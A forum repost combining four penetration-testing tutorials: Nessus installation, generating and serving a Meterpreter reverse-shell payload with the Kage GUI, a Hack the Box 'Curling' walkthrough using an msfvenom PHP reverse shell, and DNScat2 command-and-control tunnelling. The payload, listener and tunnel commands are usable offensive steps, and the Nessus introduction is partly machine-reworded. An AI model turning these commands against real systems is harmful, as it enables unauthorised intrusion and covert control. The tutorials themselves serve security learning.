05-14-2020, 12:00 PM
| 0 | 0 | ||
Table of Content
- Introduction to Nessus
- Linux Installation
- Running Vulnerability Scans
- Windows Installation
Nessus is a network vulnerability scanner that utilizes the Common Vulnerabilities and Exposures engineering for simple cross-connecting between agreeable security instruments. Nessus utilizes the Nessus Attack Scripting Language (NASL), a basic language that portrays singular dangers and potential assaults. Nessus has a measured design comprising of incorporated servers that direct examining, and remote customers that take into account chairman communication. Executives can incorporate NASL portrayals of every presumed powerlessness to create altered outputs. Noteworthy abilities of Nessus include:
- Compatible with all OS
- Scans for vulnerabilities in the local and remote host
- Informs about missing security in detail
- Applies various attacks in order to pinpoint a vulnerability
- It can schedule security audits
- Runs security tests
Let’s start the installation on Linux. Here we are installing Nessus on an Ubuntu 18 Machine. Firstly, we will invoke a root shell using sudo bash command. We are going to install Nessus using a deb file that can be downloaded from the
[To see content please register here]
. We traverse to the directory where we have downloaded the deb file. We will change permission to execute the file and then we will install the Nessus.deb file using the dpkg command.chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb
dpkg -I Nessus*.deb
1
2
chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb
dpkg -I Nessus*.deb
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-VtwvDaO_vVo/XKtjAVUbdvI/AAAAAAAAd2w/CWNPwuvYxd4ljYdC0tJvtpFmbwmE1R39ACLcBGAs/s1600/1.png?w=687&ssl=1)
Afterwards, as shown in the image using the following command to run Nessus :
/etc/init.d/nessusd start
1
/etc/init.d/nessusd start
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-sUHDfiqsm1A/XKtjDNuKiSI/AAAAAAAAd3U/W6vuoiwZmBox_Tauulj2p8c8dC-0a56mACLcBGAs/s1600/2.png?w=687&ssl=1)
This command will open our default browser, which in our case is Mozilla Firefox. And we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. The first click on Advanced followed by Accept the Risk and Continue.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-3mIxbw0H_iQ/XKtjDgpPLfI/AAAAAAAAd3c/nAdt1olk9Q8gusRCPws8Vrgcxef0NsqeACLcBGAs/s1600/3.png?w=687&ssl=1)
Then it will ask you to create an account, as shown in the image, give the details for it.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-zGhKr9sDeyw/XKtjEKGlbXI/AAAAAAAAd3k/klP0YUXlQ2EDp2vjmG-RZlOrjib9QpJ9ACLcBGAs/s1600/4.png?w=687&ssl=1)
Further, it will ask you for an activation code, provide that just as its shown in the image below :
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-tAjMt7IcpSU/XKtjEASctVI/AAAAAAAAd3g/fCFvD8aLneY2NwEYqw65n1jwvT8A8tgAgCLcBGAs/s1600/5.png?w=687&ssl=1)
Once all the formalities are done, Nessus will open and will allow you to perform any scan you desire as shown in the image below :
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-2b3cJuO85kw/XKtjEovcdwI/AAAAAAAAd3o/etq4pxnB3106-mzfU8lNar1TeVnpxSinwCLcBGAs/s1600/6.png?w=687&ssl=1)
Running Vulnerability Scans
When you click on create new scans, there will be multiple scans that you can see in the following image :
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-p4LBY0Syhi4/XKtjE7sSdFI/AAAAAAAAd3s/s2SCVKRNcnYrykYyY7N-9hWAsne6J72lACLcBGAs/s1600/7.png?w=687&ssl=1)
And then in the policies tab, you can generate different policies on which the scans are based.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Z1Gp2MsRvg4/XKtjFF65fVI/AAAAAAAAd3w/V5uoNEqYJkYlqsDe3iYR-bOX_acLiQtYgCLcBGAs/s1600/8.png?w=687&ssl=1)
There are various policies templates too, as shown in the image below :
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-ExDTn776mj0/XKtjFcO8iBI/AAAAAAAAd30/OHxLmGpqmKAnElz1973ajkzov-LHa_0pACLcBGAs/s1600/9.png?w=687&ssl=1)
In order to start a new scan, go to scan templates and select a new scan and then give it a name and target IP as shown in the following image :
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-kFgXpCbdndg/XKtjAarPYFI/AAAAAAAAd20/7ftCcGyKd5M7DnO4COjHcKvcGfnRuv76ACLcBGAs/s1600/10.png?w=687&ssl=1)
Once the scan is done, it will show you the result; this result will clearly indicate the risk that a vulnerability poses which goes from low to critical.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-x86d4qbsjZY/XKtjAo1bL8I/AAAAAAAAd24/DML1o_lCxsIqJbcnN_KnmctZasjXgdGXgCLcBGAs/s1600/11.png?w=687&ssl=1)
When you click on the vulnerability, for instance here we clicked on the first one which is a critical threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-utMpSc7kn1Y/XKtjBcQ5qAI/AAAAAAAAd28/M6cgp1nt_rgSOCmK7prqLE6xpkG7Pxi_gCLcBGAs/s1600/12.png?w=687&ssl=1)
Now, we clicked on the different one which is a high-level threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-xEV0kQ_Q7aI/XKtjBbYuVCI/AAAAAAAAd3A/2zvmbfgV_vE_V6IzwyxYVqu3uytYGuY4ACLcBGAs/s1600/13.png?w=687&ssl=1)
Windows Installation
Download Nessus for windows from
[To see content please register here]
. And open it similarly in the browser to set it up.![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-j8i4a3E7yho/XKtjBnUKP7I/AAAAAAAAd3E/4EUbdP05sTEaDLZTEPVm4f5UAQ3-2-5_gCLcBGAs/s1600/14.png?w=687&ssl=1)
Just like in Linux, we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. First click on Advanced followed by Accept the Risk and Continue.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-OGsOeeDmRME/XKtjCIPK1tI/AAAAAAAAd3I/x74mcdusIbcxx6r3DIzRWznj0CVJRLjYwCLcBGAs/s1600/15.png?w=687&ssl=1)
Then it will ask you to create an account, as shown in the image, give the details for it.
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/--IcCHAEqyp0/XKtjCebqeLI/AAAAAAAAd3M/pZz3AL9Rlcg0XkQzo1NMAW6x3DZiAcFAgCLcBGAs/s1600/16.png?w=687&ssl=1)
Further, it will ask you for an activation code, provide that just as its shown in the image below :
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-B7xYc8fU7To/XKtjCzIRtpI/AAAAAAAAd3Q/zdsfIC2JStA28If9X6ucnGzlf18fiY-_ACLcBGAs/s1600/17.png?w=687&ssl=1)
And then you can start your scans in a similar way just as shown above in Linux.
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-pIZCvMxn1yU/XKtjDQmlqNI/AAAAAAAAd3Y/7-1dREhbtFgTQjhZ3QHhyPpwYhC4DB5qgCLcBGAs/s1600/18.png?w=687&ssl=1)
Kage is a GUI for Metasploit RCP servers. It is a good tool for beginners to understand the working of Metasploit as it generates payload and lets you interact with sessions. As this tool is on the process of developing until now it only supports windows/meterpreter and android/meterpreter. For it to work, you should have Metasploit installed in your system. The only dependency it requires is npm.
Installation
Use the following git command to install the kage software :
git clone //github.com/WayzDev/Kage.git
1
git clone //github.com/WayzDev/Kage.git
![[Image: 1.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-yXcpK1Vzl-M/XKYspITpAwI/AAAAAAAAd1c/Xdxk8wktkoMlkNCtyrud96Te8MAor0UXACLcBGAs/s1600/1.png?w=687)
Go inside the kage folder and install nmp with the following command :
apt-get install npm
1
apt-get install npm
![[Image: 2.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-zRzpJ3ouYbg/XKYsrcBxhTI/AAAAAAAAd10/Pc0pJWIBcxQnzGXnUelaYFdovi6Y6b92gCLcBGAs/s1600/2.png?w=687)
Further, use the following command :
npm install
1
npm install
![[Image: 3.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-IFciG6plLT0/XKYsrRRpC0I/AAAAAAAAd14/Qa0EBN7cSMkrOCN9Z-Dd_uBjGCvX2Lt_wCLcBGAs/s1600/3.png?w=687)
And then run it with the following command :
npm run dev
1
npm run dev
![[Image: 4.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-s0O1Cxz8C-g/XKYsr_VSQ3I/AAAAAAAAd18/Q4cDnEZjQ5Ugw5o4tO7iAtOYSpKPiFxMQCLcBGAs/s1600/4.png?w=687)
Once all the perquisites are done, the kage will run. Click on the start server button as shown in the image below :
![[Image: 5.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-FEW45Btfwwk/XKYssT9K5II/AAAAAAAAd2E/eVf3uGA7f_Qt3ZEgT_gLytsAXEWObzcEQCLcBGAs/s1600/5.png?w=687)
The server will start running. Once all the process is done, click on the close button as shown in the image below :
![[Image: 6.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-_3EceagGr4Y/XKYssT0dTaI/AAAAAAAAd2A/UYxX86sJFewlTwNwwywiPrnls4uvQ57-QCLcBGAs/s1600/6.png?w=687)
After click on the close button, it will automatically take all the details, and then you can click on the connect button to connect as shown in the image below :
![[Image: 7.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-16byoPsir_8/XKYsshcipLI/AAAAAAAAd2I/oW1HpW2J14E1xkL5LWHebWkk-iuzRg-XQCLcBGAs/s1600/7.png?w=687)
Once you are connected, it will show you the following windows :
![[Image: 8.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-18DIOBC1UKs/XKYstIyk-4I/AAAAAAAAd2M/nuOFGrxgZXk9_vrNH7-eRKVs8s12oLzEACLcBGAs/s1600/8.png?w=687)
Under the heading payload generator, you can give all the details such as file name (kage.exe), payload (windows/meterpreter/reverse_tcp), lhost (192.168.1.9), lport (5252) and then click on generate.
![[Image: 9.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-P7gErAB0Xnc/XKYstTJnUOI/AAAAAAAAd2Q/VlFZE2bLRq0VKDzXexHAnLaY6xgqoD5xQCLcBGAs/s1600/9.png?w=687)
After clicking on generate, it will create a new folder named kage (with small k), here, run python server so that you can share your malware with the victim. To run the python server, type :
python -m SimplpeHTTPServer 80
1
python -m SimplpeHTTPServer 80
![[Image: 10.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-MSUsVKq6l5w/XKYso--FI2I/AAAAAAAAd1Y/y_0rt8zjx74ndObRDsv2RirZaiuVaOU0ACLcBGAs/s1600/10.png?w=687)
Once the file is shared and executed, it will show the following details under the jobs heading :
![[Image: 14.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-0hJxm0IKIWk/XKYspA3KfoI/AAAAAAAAd1g/NNcxs9-M6loPZgeTC53WwzXbuFcMu4tnQCLcBGAs/s1600/14.png?w=687)
And when you go the sessions window through the dashboard, you will find a new session that has been created. Click on interact button to access the session.
![[Image: 15.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-aZ0iUC90Vtk/XKYsp3MmHkI/AAAAAAAAd1k/t4wc5Jcsn2se2ocnMIXoErF6F2mC8Vt7wCLcBGAs/s1600/15.png?w=687)
After clicking on the interact button, the following window will open. Here, the first tab will show you all the information about the system.
![[Image: 16.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-t4GVQyW8gu4/XKYsqeomYJI/AAAAAAAAd1o/qKU5tcShEkM9uVOGKcB1nPjDTIAuMejewCLcBGAs/s1600/16.png?w=687)
The second tab will show you all the processes that are running on the victim’s PC.
![[Image: 17.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-Vgd7GwCdk84/XKYsqmOgfBI/AAAAAAAAd1s/eRQXYIOlQXMGjofekdHQoZWrkKxcX-EWwCLcBGAs/s1600/17.png?w=687)
And the third tab will give you all the information about its network. Here, you can use three commands through buttons provided and i.e. ifconfig, netstat, route, as shown in the image below :
![[Image: 18.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-00fkmOZblus/XKYsqq6BY2I/AAAAAAAAd1w/XaBnt9WvB50E_fTrjiw5p-8UA6FrCufVwCLcBGAs/s1600/18.png?w=687)
Today we are going to solve another CTF challenge “Curling”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Curling is 10.10.10.150
Penetrating Methodology
- Network scanning (Nmap)
- Surfing the IP address on the browser
- Finding Secret View Page Source
- Decoding Secret
- Enumerating Joomla!
- Creating Payload using msfvenom
- Getting Meterpreter Session
- Enumerate and Extract password files
- Getting SSH Session
- Grab User Flag
- Enumerate for Root Flag
- Getting the root flag
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -sV -sC -T4 -p- 10.10.10.150
1
nmap -sV -sC -T4 -p- 10.10.10.150
![[Image: 1.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-GggnWd0ZAlw/XKWf-kxugtI/AAAAAAAAdz4/P8EPf2eLI9cd9SoGrJB2crRatAg3MsIkQCLcBGAs/s1600/1.png?w=687)
The Nmap scan shows 2 open ports: 22(SSH), 80(HTTP)
As port 80 is running HTTP service, we open the IP address in the web browser.
![[Image: 2.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-Hvz6gsh5oLE/XKWgBgOZlnI/AAAAAAAAd0c/SKukLzu4t0ElGvtB4ZY1cbo9mjIMszBAQCLcBGAs/s1600/2.png?w=687)
Here, we found two usernames Floris & Super User. They might come in handy later on. Let’s view the Page source of the webpage.
![[Image: 3.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-avDO5Upq0mE/XKWgCGan-rI/AAAAAAAAd0g/JNiSM-lXvj8kvLkQZ0xd8gghYKZEct2cACLcBGAs/s1600/3.png?w=687)
Let’s open the secret.txt in the browser. It displayed a base64 encoded string.
![[Image: 4.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-leZykQDOb5k/XKWgC8u33DI/AAAAAAAAd0k/pyqntSpyNIYdfsjIeGfV71vseC7FWePuwCLcBGAs/s1600/4.png?w=687)
Time to decode this base64 encoded string. So, on decoding it we got Curling2018! This can be used as a credential.
echo "Q3VybGluZzIwMTgh" | base64 -d
1
echo "Q3VybGluZzIwMTgh" | base64 -d
![[Image: 5.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-EwzWxxUfUwY/XKWgDYKE7pI/AAAAAAAAd0o/3EFL49TDqf4zlOElpU8wItqnxcyXlfqJwCLcBGAs/s1600/5.png?w=687)
Due to previous experience with Joomla! We already knew about its administrator login page. Not wasting our time we directly opened /administrator directory in the browser along with the credentials.
Username- Floris
Password- Curling2018!
![[Image: 6.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-2mfxt-74yQM/XKWgDa_o6vI/AAAAAAAAd0s/u34YHqBy6e0a7baLZ4odGZvgeRjNJN20QCLcBGAs/s1600/6.png?w=687)
We have successfully logged in.
![[Image: 7.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-3Is-bPENCrc/XKWgDhVfz5I/AAAAAAAAd0w/RMAYrVRBovYxr1COJO7Q0-Tio988J-GqQCLcBGAs/s1600/7.png?w=687)
We have created a PHP shell payload using msfvenom.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.120 lport=443 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.120 lport=443 -f raw
![[Image: 8.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-5mGbZMWlt1c/XKWgD8oN6aI/AAAAAAAAd00/cQfSdHwgH18MWRu2V8UM6c4FGmVn8KfyQCLcBGAs/s1600/8.png?w=687)
On the other hand, we have setup listening using Metasploit-framework.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run
![[Image: 9.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-67XOzzhVT74/XKWgEJCfQPI/AAAAAAAAd04/Z_Bj-b23DPgYU4cIRE5ZGkCFWAunEIhrgCLcBGAs/s1600/9.png?w=687)
Let’s try to upload php reverse shell script which we have created using msfvenom. Let’s first navigate to /template/protostar/ on the webpage.
![[Image: 10.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-idd864ldKII/XKWf-pMz63I/AAAAAAAAdz0/wDDwoeUhdas0InyIKPOXrP4zRSGfELlWwCLcBGAs/s1600/10.png?w=687)
Finally, we have got the meterpreter.
![[Image: 11.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-tVFNtjbukok/XKWf-fTK97I/AAAAAAAAdzw/ugJ9QuJd_P8zLU1juOucMLC75CZUIh3yQCLcBGAs/s1600/11.png?w=687)
We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python.
shell
python3 -c "import pty;pty.spawn('/bin/bash')"
1
2
shell
python3 -c "import pty;pty.spawn('/bin/bash')"
![[Image: 12.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-1USMHM1t8NE/XKWf_L8yRBI/AAAAAAAAdz8/tV8SJUB7il8GqyW6Fg2Lah52EZi70qsUgCLcBGAs/s1600/12.png?w=687)
After enumerating through directories, we found a useful file password_backup. Let’s check its contents. The contents of this file look like hexdump.
ls -al
cat password_backup
1
2
ls -al
cat password_backup
![[Image: 13.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-mESC4btXeMk/XKWf_V5xDNI/AAAAAAAAd0A/TwImxC9GW74_btU98JLfjbDMnU-NO-SfgCLcBGAs/s1600/13.png?w=687)
Let’s use an xxd tool which is used to create hex dump of the given file or standard input. On decompressing the file we saw the author of the machine has recursively compressed the password_backup file. We need to recursively decompress it.
xxd -r password_backup > password
file password
mv password password.bz2
bzip2 -d password.bz2
ls
file password
mv password password.gz
gzip -d password.gz
ls
file password
mv password password.bz2
bzip2 -d password bz2
ls
mv password password.tar
tar xvf password.tar
cat password.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
xxd -r password_backup > password
file password
mv password password.bz2
bzip2 -d password.bz2
ls
file password
mv password password.gz
gzip -d password.gz
ls
file password
mv password password.bz2
bzip2 -d password bz2
ls
mv password password.tar
tar xvf password.tar
cat password.txt
The content found in password.txt might be the password to login into SSH. Let’s find out if our intuition is true or not.
![[Image: 14.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-ctIIkEN0U1s/XKWf_tWA7XI/AAAAAAAAd0E/dSZDxMsv_go8vaYK_zTn8-pLz1N9HkS4QCLcBGAs/s1600/14.png?w=687)
We have successfully logged into SSH using the password found in password.txt.
ssh [email protected]
1
ssh [email protected]
On exploring, we found User.txt and read its contents.
ls
cat user.txt
1
2
ls
cat user.txt
![[Image: 16.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-g8mFTmOQ1-I/XKWgAYOLKrI/AAAAAAAAd0M/KvEgAbRumk8s1jKXc50h8jY4_f9HexLOgCLcBGAs/s1600/16.png?w=687)
On further enumerating, we found two files input & report in the admin-area folder. Let’s read the contents of both the files.
cat input
wc -l report
1
2
cat input
wc -l report
![[Image: 17.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-ctFuwnPR8DA/XKWgAqBQ1NI/AAAAAAAAd0U/DSIuIuYXnosMc6Hn_JFYLGLJFCWB1dFFgCLcBGAs/s1600/17.png?w=687)
After sometime of thinking, we thought of changing the content of the input file using echo.
ls -al
echo "file:///root/root.txt" > input
1
2
ls -al
echo "file:///root/root.txt" > input
![[Image: 18.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-dMg4nwEU7bM/XKWgApN3PKI/AAAAAAAAd0Q/S3SOfQvHKYMBwifuUhj-OJe9yfw87RzSACLcBGAs/s1600/18.png?w=687)
It took us time to think about it. We did this because we knew our final flag is inside /root/root/txt. And also came to know the output of the input file will be saved in the report file.
Now after some time when we opened the report file. We found our Final Flag and read its contents.
wc -l report
cat report
1
2
wc -l report
cat report
![[Image: 19.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-6T65Ycio5EE/XKWgBGN4icI/AAAAAAAAd0Y/RM-M4PjrdKMvPHjmBHXJX9OGVKFZMQMZwCLcBGAs/s1600/19.png?w=687)
In this article, we learn DNS tunneling through an amazing tool i.e. DNScat2
Table of Content :
- Introduction to DNS
- Introduction to DNScat
- Installation
- DNS tunneling
- Conclusion
The Domain Name System (DNS) associate’s URLs with their IP address. With DNS, it’s conceivable to type words rather than a series of numbers into a browser, enabling individuals to look for sites and send messages utilizing commonplace names. When you look for the domain name in a browser, it sends a question over to the DNS server to coordinate the domain with its IP. When found, it utilizes the IP to recover the site’s content. Most astonishingly, this entire procedure takes just milliseconds. For all this working, it uses port 53.
Introduction to DNScat
DNScat is such praised tool because it can create a command and control tunnel over the DNS protocol which lets an attacker work in stealth mode. You can access any data along with uploading and downloading files and to get a shell. For this tool to work over 53 port, you don’t need to have authoritative access to DNS server, you can just simply establish your connection over port 53 and it will be faster and it will still be sensed as usual traffic. But it makes its presence well known in the packet log.
DNScat is made of two components i.e. a server and a client. To know the working of dnscat, it is important to understand both of these components.
The client is intended to be kept running on a target machine. It’s written in C and has the least amount of the prerequisites. When you run the client, you regularly indicate a domain name. All packets will be sent to the local DNS server, which is then directed to the legitimate DNS server for that domain (which you, apparently, have control of).
The server is intended to be kept running on a definitive DNS server. It’s developed in ruby and relies upon a few distinct gems. When you run it, much like the client, you indicate from which domain(s) it listens to over 53. When it gets traffic for one of those domains, it endeavours to set up a legitimate association. It gets other traffic it will automatically disregard it but, however, it can also advance it upstream.
Installation
Run the following git command to download dnscat2 :
git clone //github.com/iagox86/dnscat2.git
1
git clone //github.com/iagox86/dnscat2.git
![[Image: 1.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-ILD6O2iFW30/XKObfNsLklI/AAAAAAAAdyU/9993mig-C34d54JV1viY3meoE1ESu5JZACLcBGAs/s1600/1.png?w=687)
Now install bundler as it is a major dependency for dnscat2. To install bundler go into the server of dnscat2 and type :
gem install bundler
bundle install
1
2
gem install bundler
bundle install
![[Image: 2.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-HAMrmncIV6Q/XKObh0yO46I/AAAAAAAAdyw/Q1RQUNYTh2kE-bgPRuiuTI7y6-WmJLLTwCLcBGAs/s1600/2.png?w=687)
Once everything is done, the server will run with the following command :
ruby dnscat2.rb
1
ruby dnscat2.rb
![[Image: 3.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-FXoFrS8OJpk/XKObiYINPBI/AAAAAAAAdy4/i_3ybYx49vEkewxcfoI8QVh6By2GY8TYwCLcBGAs/s1600/3.png?w=687)
Similarly, download dnscat2 in the client machine too. And use make command to compile it with the server, as shown in the image below :
![[Image: 4.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-fLW0Fym1W6I/XKObi7y3dwI/AAAAAAAAdy8/HFq9pjpMq4w-gdLNH2ALkQfxo_ql8U2OACLcBGAs/s1600/4.png?w=687)
To establish a connection between client and server, use the following command :
./dnscat2 --dns-server=192.168.174.131,port=53
1
./dnscat2 --dns-server=192.168.174.131,port=53
![[Image: 5.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-6F1FCxK_Wjc/XKObjCNJMKI/AAAAAAAAdzA/LxsQTqUBwsM0tyVXUwM1OvnU0uakoeAUgCLcBGAs/s1600/5.png?w=687)
Once the connection is established, you can see on the server side that you will have a session as shown in the image below. You can use the command ‘sessions’ to check for a session that is created.
![[Image: 6.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-iH066hS8mkc/XKObja1qfLI/AAAAAAAAdzE/y6abUw_Aj5kymECmdxU84UMRqZ1hXliygCLcBGAs/s1600/6.png?w=687)
To interact with the said session type the following command :
session -i 1
1
session -i 1
As you can access the session now, use the word ‘ping’ to ping the target and if it replies ‘Pong!’ then you ping is successful.
![[Image: 7.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-to0mqkOn07M/XKObkP8kT0I/AAAAAAAAdzI/5CZYVHFHxVkT0GBasSHtGvRjEcYWCNvvwCLcBGAs/s1600/7.png?w=687)
Following will be the response on the client side of the ping command.
![[Image: 8.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-fNwZ8qCwDDU/XKObkB4EAgI/AAAAAAAAdzM/7x9OPDYTgGEmcPbXfEkbcMbb3Rr6Ef5aQCLcBGAs/s1600/8.png?w=687)
Further will the help command you can see all the options that we can use to our advantage. If you want to go to the shell then just type ‘shell’ and it will open a new window with the session to interact with the shell of the target system.
![[Image: 9.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-ApSrCbY-zT8/XKObkWQDbtI/AAAAAAAAdzQ/f3DA53iNVrwFsGojczNub2BE0iGj16F-gCLcBGAs/s1600/9.png?w=687)
To interact with the shell session that is opened in a new terminal, type following set of commands :
windows
session -i 2
1
2
windows
session -i 2
![[Image: 10.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-178YqcizlVY/XKObfea5X6I/AAAAAAAAdyY/Y-LUFYvP6VApOG33YM6kwlFpmM5IjSnuACLcBGAs/s1600/10.png?w=687)
Once you are in the session, you can execute any shell command like ‘uname -a’ as shown in the image above.
DNS Tunnelling
DNS tunnelling is the best attack through DNScat2. If through ifconfig you find two networks in your target system, as shown in the image below, you can easily perform DNS tunnelling.
![[Image: 11.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-vZUjx2_v_QA/XKObfcnImEI/AAAAAAAAdyc/8KLPkurUyJkwOY8yiQK-jF9EmamyUC4VQCLcBGAs/s1600/11.png?w=687)
For DNS tunnelling, type the following command :
listen 127.0.0.1:888 10.0.0.10:22
1
listen 127.0.0.1:888 10.0.0.10:22
![[Image: 12.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-Yean_d4DAJs/XKObgZw4X7I/AAAAAAAAdyg/Dq7W36BuJ_MsrGOXo8eQza0lKpes-TBqgCLcBGAs/s1600/12.png?w=687)
Now you can try and connect to the SSH port with the following command :
ssh [email protected] -p 888
1
ssh [email protected] -p 888
Then, once connected, you can use ‘ifconfig’ command to see the network you have tunnelled for as shown in the following image :
![[Image: 13.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-Lc4mvmFh4zI/XKObgsqp-DI/AAAAAAAAdyo/dHq3YzSRLdAJo22mMMPSwv2uR_Pd0xpJACLcBGAs/s1600/13.png?w=687)
As you have SSH control of the second network too, you can download DNScat2 in the said network too, in order to attack that network as well. Once you have downloaded DNScat2 in that network, type the following command to run it and have your session on the DNScat2 server :
dnscat2.exe --dns=server=192.168.174.131,port=53
1
dnscat2.exe --dns=server=192.168.174.131,port=53
![[Image: 14.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-2VVvGisBQiI/XKObgnAWmoI/AAAAAAAAdyk/rfgV0tgkI8wNGgapVgA8tNxgqU-iYu0bACLcBGAs/s1600/14.png?w=687)
Once the above command is executed, you will have a new session that you can access with the following set of commands :
sessions
session -i 2
1
2
sessions
session -i 2
And once you have access to the session, you can run any command.
![[Image: 15.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-hS23tC-0Me8/XKObhbTPB4I/AAAAAAAAdys/6sM1DU2W7OErJiZc4GHeRB7QtbFsZ11sACLcBGAs/s1600/15.png?w=687)
And when further you use the systeminfo command, it will show you the details of the second system that you have gotten the access of through tunnelling.
![[Image: 16.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-ft96Wreb4jQ/XKObh69WHDI/AAAAAAAAdy0/R-qCQg2uaIY6UJQYAUAr9cskFATOWkJyQCLcBGAs/s1600/16.png?w=687)
Conclusion
Even in the most confined situations, DNS traffic ought to be permitted to determine inner or outside network. This can be utilized as a correspondence channel between an objective host and the command and control server. Command and information are contained inside DNS inquiries and identification that is why detection is troublesome since arbitrary command hides in plain sight due it being perceived as legitimate traffic. And this is exactly what DNSCat takes advantage of, making it a successful tool to attack.
